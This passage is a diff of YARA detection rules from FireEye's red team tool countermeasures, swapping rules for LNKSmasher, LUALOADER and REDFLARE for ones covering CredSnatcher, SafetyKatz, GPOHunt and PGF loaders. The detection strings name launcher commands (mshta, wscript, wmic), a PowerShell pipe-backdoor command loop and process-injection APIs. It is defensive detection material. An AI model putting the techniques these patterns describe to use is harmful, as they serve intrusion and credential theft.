"751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide + $typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE +rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE { meta: - description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project." author = "FireEye" - id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4" + id = "0d8f7495-4748-577d-8ef2-ccc4829fc165" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "0a86d64c3b25aa45428e94b6e0be3e08" - logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 6 + rev = 1 strings: - $drive_serial = { 12 F7 26 BE } - $file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 } - $guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D } - $header = { 4C 00 00 00 01 14 02 } + $typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide condition: - $header at 0 and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE { meta: - description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project." author = "FireEye" - id = "1a12e475-bb18-55ab-b629-47b711c10e6b" - date = "2018-09-04" + id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "14dd758e8f89f14612c8df9f862c31e4" - logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe" - score = 60 - quality = 53 + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c" + score = 75 + quality = 73 tags = "FILE" - rev = 7 + rev = 2 strings: - $a01 = "cmd.exe /" ascii nocase wide - $a02 = "cscript" ascii nocase wide - $a03 = "jscript" ascii nocase wide - $a04 = "wscript" ascii nocase wide - $a05 = "wmic" ascii nocase wide - $a07 = "mshta" ascii nocase wide - $header = { 4C 00 00 00 01 14 02 } + $typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide condition: - (($header at 0) or (( uint32(0)==0xE011CFD0) and $header)) and (1 of ($a*)) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project." author = "FireEye" - id = "970a869e-bd69-5609-bb8d-77bfa78b0630" - date = "2020-12-18" - modified = "2020-12-18" + id = "e4325f11-103c-5893-8978-9a72f7ca6105" + date = "2020-12-09" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c" - score = 75 - quality = 75 + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7" + score = 50 + quality = 73 tags = "FILE" + rev = 3 strings: - $sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A } - $ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00" - $ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00" - $ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00" - $ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide - $ss5 = "1F 8B 08 00 00 00 00 00" wide + $typelibguid0 = "751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project." author = "FireEye" - id = "e8480cf8-1852-5572-8e92-c0ae676b7507" + id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf" + hash = "45736deb14f3a68e88b038183c23e597" + logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897" score = 75 quality = 73 tags = "FILE" rev = 3 strings: - $typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide + $typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE +rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "f2826dbb-f0a4-5361-94d1-8509c60c4131" - date = "2020-12-18" - modified = "2020-12-18" + id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6" + date = "2020-11-26" + date = "2020-11-26" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88" + hash = "4414953fa397a41156f6fa4f9462d207" + logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8" score = 75 quality = 75 tags = "FILE" + rev = 1 strings: - $ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00" - $ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00" - $ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00" - $ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide - $ss5 = "1F 8B 08 00 00 00 00 00" wide - $ss6 = "\x00LoadLibrary\x00" - $ss7 = "\x00GetProcAddress\x00" - $ss8 = "\x00VirtualProtect\x00" + $sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 } + $sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -import "pe" +rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE +{ + meta: + description = "base dlls: /lib/payload/techniques/dllmain/" + author = "FireEye" + id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd" + date = "2020-11-25" + date = "2020-11-25" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "04eb45f8546e052fe348fda2425b058c" + logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21" + score = 75 + quality = 75 + tags = "FILE" + rev = 1 -rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1 + strings: + $sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? } + $sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? } + $sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 } + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them +} +rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "base dlls: /lib/payload/techniques/unmanaged_exports/" author = "FireEye" - id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9" - date = "2020-12-18" - modified = "2020-12-18" + id = "1af4f2ce-c540-5836-a749-43a0b08609b1" + date = "2020-11-25" + date = "2020-11-25" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d" + hash = "383161e4deaf7eb2ebeda2c5e9c3204c" + logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e" score = 75 - quality = 63 - tags = "" + quality = 75 + tags = "FILE" + rev = 1 strings: - $s1 = "function Invoke-Client()" ascii nocase wide - $s2 = "function Invoke-Server" ascii nocase wide - $s3 = "Read-Host 'Enter Command:'" ascii nocase wide - $s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide - $s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide - $s6 = " = iex $" ascii nocase wide + $sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB } + $sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) } + $sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 } condition: - all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Builder_PY_REDFLARE_2 +rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py" author = "FireEye" - id = "1af407f5-6eb7-5be9-a3d9-cd0f7a5f2503" - date = "2020-12-01" - date = "2020-12-01" + id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_2.yar#L4-L18" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4410e95de247d7f1ab649aa640ee86fb" - logic_hash = "675390e944a95156ad33ca783c90fdea9610cdc2e8c5c53e0c0fa213149b4714" + hash = "7c2a06ceb29cdb25f24c06f2a8892fba" + logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03" score = 75 quality = 75 - tags = "" + tags = "FILE" rev = 1 strings: - $1 = "<510sxxII" - $2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00," - $3 = "parsePluginOutput" + $sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 } + $ss1 = "\x00CreateThread\x00" + $ss2 = "\x00ScriptObjectStackTop\x00" + $ss3 = "\x00Microsoft.JScript\x00" condition: - all of them and #2==2 + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "15a5e22b-84b0-5b36-8772-1d496ac447b2" - date = "2020-11-27" - date = "2020-11-27" + id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb" + date = "2020-11-26" + date = "2020-11-26" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "9529c4c9773392893a8a0ab8ce8f8ce1" - logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875" + hash = "3bb34ebd93b8ab5799f4843e8cc829fa" + logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234" score = 75 quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $const = "Cookie: SID1=%s" fullword - $http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 } + $sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 } + $sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 } condition: ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads." author = "FireEye" - id = "c3054680-9c87-5d90-b78e-b260904340df" - date = "2020-11-27" - date = "2020-11-27" + id = "340ea6d4-7111-520c-9bd4-0465a43ea235" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_1.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "100d73b35f23b2fe84bf7cd37140bf4d,4e7e90c7147ee8aa01275894734f4492" - logic_hash = "08ea2151418f7f75a8b138146c393a5ea85647320cc8e9fe1930d75871ab94bb" + hash = "3bb34ebd93b8ab5799f4843e8cc829fa" + logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b" score = 75 quality = 75 tags = "FILE" - rev = 3 + rev = 4 strings: - $1 = "initialize" fullword - $2 = "runCommand" fullword - $3 = "stop" fullword - $4 = "fini" fullword - $5 = "VirtualAllocEx" fullword - $6 = "WriteProcessMemory" fullword + $cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 87 F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CB 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 37 FC 00 00 48 89 D8 48 89 C1 E8 4C AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9A 9C 01 00 48 89 D8 48 89 C1 E8 2F AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } + $cond2 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8D 85 ?? ?? ?? ?? 41 B8 04 01 00 00 48 89 C2 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 89 C2 B9 08 00 00 00 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 38 04 00 00 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 48 8D 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 41 B8 00 00 00 00 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 FF 0F 95 C0 84 C0 